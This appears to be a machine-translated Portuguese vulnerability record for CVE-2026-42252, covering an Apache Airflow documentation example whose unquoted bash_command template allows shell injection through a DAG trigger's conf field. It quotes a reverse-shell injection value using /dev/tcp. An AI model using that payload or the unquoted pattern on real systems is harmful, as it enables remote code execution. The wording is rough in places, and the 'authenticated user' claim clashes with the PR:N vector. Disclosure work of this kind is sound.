A documentação oficial do Apache Airflow em `core-concepts/dag-run.html` ("Passando Parâmetros ao desencadear Dags") mostrou um valor textual `BashOperator(bash_command="echo value: {{ dag_run.conf['conf 1 '] }}") ' exemplo sem qualquer aviso de citação / desinfectação. Autores dag que copiaram o padrão verbalmente em implantações onde os usuários tinham permissão `Dag.can_trigger` no Dag afetado (implementações típicas de multi- equipes, ofertas hospedadas expondo uma API de gatilho) poderiam ser expostos à injeção de metacaracter shell através do campo `conf` da API de gatilho: um usuário de gatilho autenticado poderia fornecer `;; bash - i > & /dev/ tcp/.../ 9999 0 >& 1; #"` como um valor `conf` e alcançar um `os.exec` no trabalhador. Este CVE cobre a correção de documentação no 'pache/airflow' PR 64129 — o padrão no exemplo docs agora inclui citações explícitas de shell e uma advertência de segurança. Afeta as implementações cujo código Dag foi modelado no exemplo de documentos de pré- correção. A mesma classe que a CVE anterior 2025 - 50213 e CVE- 2025 - 27018 correções do padrão de documentação. Os usuários são aconselhados a atualizar para `pache- airflow` 3.2.2 ou mais tarde para pegar a documentação corrigida enviada com a versão. O registro de base de dados de vulnerabilidade nacional CVE- 2026 - 42252 foi publicado em 2026 - 06 - 01 T 09: 16: 18.560 Z e última modificação em 2026 - 07 - 21 T 19: 10: 00.107 Z. O seu estado gravado é analisado.
métricas de vulnerabilidade gravadas: CVSS 3.1, pontuação de base 9.1, gravidade CRÍTICA, vetor CVSS: 3.1 /AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, pontuação de exploração 3.9, pontuação de impacto 5.2; CVSS. Classificações de fraqueza associadas: CWE- 1336.
Os produtos ou plataformas nomeados nos dados de aplicabilidade incluem: fluxo de ar apache.
O registro NVD inclui referências de suporte documentando a vulnerabilidade, tecnologia afetada ou informações de remediação.